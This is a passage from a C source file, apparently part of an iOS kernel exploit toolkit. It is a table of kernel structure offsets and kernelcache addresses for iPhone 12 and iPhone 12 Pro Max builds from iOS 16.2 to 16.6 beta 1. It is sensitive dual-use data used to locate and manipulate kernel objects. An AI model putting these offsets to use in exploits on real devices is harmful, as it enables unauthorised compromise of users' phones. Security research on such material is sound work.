+ 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3b1190, .kernelcache__gPhysBase = 0xfffffff0078500c8, .kernelcache__gPhysSize = 0xfffffff0078500c8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784e2a8, .kernelcache__perfmon_devices = 0xfffffff00a3ec3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed41c4, .kernelcache__ptov_table = 0xfffffff007803378, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3eb800, .kernelcache__vm_pages = 0xfffffff007800090, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802328, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3eb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f26780, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D47", .device_id = "iPhone13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3b1190, .kernelcache__gPhysBase = 0xfffffff00784c1b0, .kernelcache__gPhysSize = 0xfffffff00784c1b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784a390, .kernelcache__perfmon_devices = 0xfffffff00a3ec3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed00f4, .kernelcache__ptov_table = 0xfffffff0077ff3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3eb800, .kernelcache__vm_pages = 0xfffffff0077fc0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fe368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3eb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f226a0, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D67", .device_id = "iPhone13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3b1190, .kernelcache__gPhysBase = 0xfffffff00784c1b0, .kernelcache__gPhysSize = 0xfffffff00784c1b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784a390, .kernelcache__perfmon_devices = 0xfffffff00a3ec3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed00f4, .kernelcache__ptov_table = 0xfffffff0077ff3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3eb800, .kernelcache__vm_pages = 0xfffffff0077fc0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fe368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3eb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f226a0, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E247", .device_id = "iPhone13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a491208, .kernelcache__gPhysBase = 0xfffffff00792bfc0, .kernelcache__gPhysSize = 0xfffffff00792bfc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792a198, .kernelcache__perfmon_devices = 0xfffffff00a4cf520, .kernelcache__perfmon_dev_open = 0xfffffff007ef064c, .kernelcache__ptov_table = 0xfffffff0078df188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ce990, .kernelcache__vm_pages = 0xfffffff0078dbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078de128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ce988, .kernelcache__vn_kqfilter = 0xfffffff007f3f538, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E252", .device_id = "iPhone13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a491208, .kernelcache__gPhysBase = 0xfffffff00792bfc0, .kernelcache__gPhysSize = 0xfffffff00792bfc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792a198, .kernelcache__perfmon_devices = 0xfffffff00a4cf520, .kernelcache__perfmon_dev_open = 0xfffffff007ef064c, .kernelcache__ptov_table = 0xfffffff0078df188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ce990, .kernelcache__vm_pages = 0xfffffff0078dbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078de128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ce988, .kernelcache__vn_kqfilter = 0xfffffff007f3f538, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:08:42 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8101", .build_version = "20F66", .device_id = "iPhone13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a49d288, .kernelcache__gPhysBase = 0xfffffff007930100, .kernelcache__gPhysSize = 0xfffffff007930100 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e2d8, .kernelcache__perfmon_devices = 0xfffffff00a4db520, .kernelcache__perfmon_dev_open = 0xfffffff007ef484c, .kernelcache__ptov_table = 0xfffffff0078e3188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4da990, .kernelcache__vm_pages = 0xfffffff0078dfeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4da988, .kernelcache__vn_kqfilter = 0xfffffff007f439d0, }, // iOS 16.6 Beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:36 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8101", .build_version = "20G5026e", .device_id = "iPhone13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a545ab0, .kernelcache__gPhysBase = 0xfffffff0079442a8, .kernelcache__gPhysSize = 0xfffffff0079442a8 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942460, .kernelcache__perfmon_devices = 0xfffffff00a585550, .kernelcache__perfmon_dev_open = 0xfffffff007f1508c, .kernelcache__ptov_table = 0xfffffff0078f79c8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a584910, .kernelcache__vm_pages = 0xfffffff0078f4108, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6968, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a584908, .kernelcache__vn_kqfilter = 0xfffffff007f63be0, }, // End iPhone 12 Pro Max // // Start iPhone 12 // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:55 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8101", .build_version = "20C65", .device_id = "iPhone13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3b1190, .kernelcache__gPhysBase = 0xfffffff0078500c8, .kernelcache__gPhysSize = 0xfffffff0078500c8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784e2a8, .kernelcache__perfmon_devices = 0xfffffff00a3ec3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed41c4, .kernelcache__ptov_table = 0xfffffff007803378, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3eb800, .kernelcache__vm_pages = 0xfffffff007800090, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802328, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3eb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f26780, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D47", .device_id = "iPhone13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3b1190, .kernelcache__gPhysBase = 0xfffffff00784c1b0, .kernelcache__gPhysSize = 0xfffffff00784c1b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784a390, .kernelcache__perfmon_devices = 0xfffffff00a3ec3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed00f4, .kernelcache__ptov_table = 0xfffffff0077ff3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3eb800, .kernelcache__vm_pages = 0xfffffff0077fc0d0, .kernelcache__vm_page_array_beginning_addr = 